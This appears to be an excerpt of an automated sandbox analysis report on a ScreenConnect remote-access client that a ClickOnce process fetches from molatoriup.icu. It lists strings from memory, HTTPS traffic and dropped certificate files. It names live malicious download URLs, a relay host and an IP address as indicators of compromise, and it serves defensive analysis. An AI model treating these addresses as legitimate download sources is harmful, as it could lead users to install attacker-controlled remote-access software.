Source: C56C4404C4DEF0DC88E5FCD9F09CB2F10.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: dfsvc.exe, 00000001.00000002.3570203959.000001AC4F4C7000.00000004.00000020.00020000.00000000.sdmp, F2E248BEDDBB2D85122423C41028BFD40.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: svchost.exe, 00000002.00000002.3351685430.000001F535A00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: dfsvc.exe, 00000001.00000002.3570203959.000001AC4F4C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.dig
Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: dfsvc.exe, 00000001.00000002.3570203959.000001AC4F4FC000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.1.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD4157.1.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
Source: dfsvc.exe, 00000001.00000002.3570203959.000001AC4F4C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/eni
Source: svchost.exe, 00000002.00000003.1702974941.000001F5358B8000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000002.00000003.1702974941.000001F5358B8000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000002.00000003.1702974941.000001F5358B8000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000002.00000003.1702974941.000001F5358ED000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.2.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141.1.dr	String found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfIs%2BLjDtGwQ09XEB1Yeq%2BtX%2BBgQQU7NfjgtJxX
Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, C56C4404C4DEF0DC88E5FCD9F09CB2F1.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: dfsvc.exe, 00000001.00000002.3569616028.000001AC4F42C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
Source: dfsvc.exe, 00000001.00000002.3571064603.000001AC4F536000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crlwk
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35031000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.3548540826.0000000001732000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.12.dr	String found in binary or memory: http://upx.sf.net
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: support.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35426000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.o
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35347000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35433000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3570203959.000001AC4F4C7000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC354A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.w3.or
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC350BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2core
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC350BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.xrml.org/schema/2001/11/xrml2coreS
Source: dfsvc.exe, 00000001.00000002.3567540317.000001AC4EF32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: ScreenConnect.Core.dll0.1.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: svchost.exe, 00000002.00000003.1702974941.000001F535962000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000002.00000003.1702974941.000001F535962000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35579000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC357E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35031000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.C
Source: dfsvc.exe, 00000001.00000002.3570203959.000001AC4F48C000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1985585178.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1983924589.00000000012A0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1984772355.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1985585178.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1985585178.0000000002E9F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.application
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1985585178.0000000002E9F000.00000004.00000800.00020000.00000000.sdmp, 5A7K8CL9.log.1.dr	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.application
Source: dfsvc.exe, 00000001.00000002.3571640201.000001AC4F5CA000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3571640201.000001AC4F5F8000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1984772355.00000000012E6000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.1986954960.000000001B775000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.application%
Source: dfsvc.exe, 00000001.00000002.3570203959.000001AC4F48C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.application.8EV
Source: dfsvc.exe, 00000001.00000002.3570203959.000001AC4F48C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.application.8EV8EV
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1983924589.00000000012A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.application61934e089
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1983924589.00000000012A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.application7a5c561934e089
Source: 5A7K8CL9.log.1.dr	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=gbakc990.top&p=8880&
Source: dfsvc.exe, 00000001.00000002.3569616028.000001AC4F42C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.applicationP
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1985585178.0000000002E9F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.applicationX
Source: dfsvc.exe, 00000001.00000002.3570203959.000001AC4F48C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.application_
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1984772355.00000000012E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.applicationdb01h
Source: dfsvc.exe, 00000001.00000002.3546506844.000001AC33415000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.applicatione
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1984772355.00000000012E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.applications
Source: dfsvc.exe, 00000001.00000002.3565549071.000001AC4D7E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.applications_e089089
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.dll
Source: ScreenConnect.WindowsClient.exe, 00000006.00000002.1985585178.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, 5A7K8CL9.log.1.dr	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Client.manifest
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35579000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.ClientSer
Source: dfsvc.exe, 00000001.00000002.3571640201.000001AC4F5F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.ClientService.dll
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3565549071.000001AC4D7B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.ClientService.exe
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35579000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35229000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3572628134.000001AC4F75C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Core.dll
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC35705000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Windo
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC357E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3569616028.000001AC4F41C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.Windows.dll
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.WindowsBackstageS
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.WindowsBackstageShell.exe
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config
Source: dfsvc.exe, 00000001.00000002.3571640201.000001AC4F5F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config%
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.WindowsBackstageShell.exeX
Source: dfsvc.exe, 00000001.00000002.3570203959.000001AC4F48C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.WindowsBackstageShell.exeo
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC357E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.WindowsCl
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC357E5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC35229000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.WindowsClient.exe
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.WindowsClient.exe.config
Source: dfsvc.exe, 00000001.00000002.3570203959.000001AC4F48C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.WindowsClient.exe.configO
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.WindowsFileMa
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.WindowsFileManager.ex8
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.WindowsFileManager.exe
Source: dfsvc.exe, 00000001.00000002.3548401601.000001AC3565A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3565549071.000001AC4D764000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://molatoriup.icu/Bin/ScreenConnect.WindowsFileManager.exe.config
Source: svchost.exe, 00000002.00000003.1702974941.000001F535962000.00000004.00000800.00020000.00000000.sdmp, edb.log.2.dr, qmgr.db.2.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.2.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Uses secure TLS version for HTTPS connections

Source: unknown

HTTPS traffic detected: 31.42.187.211:443 -> 192.168.2.4:49731 version: TLS 1.2

E-Banking Fraud

Drops certificate files (DER)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141	Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

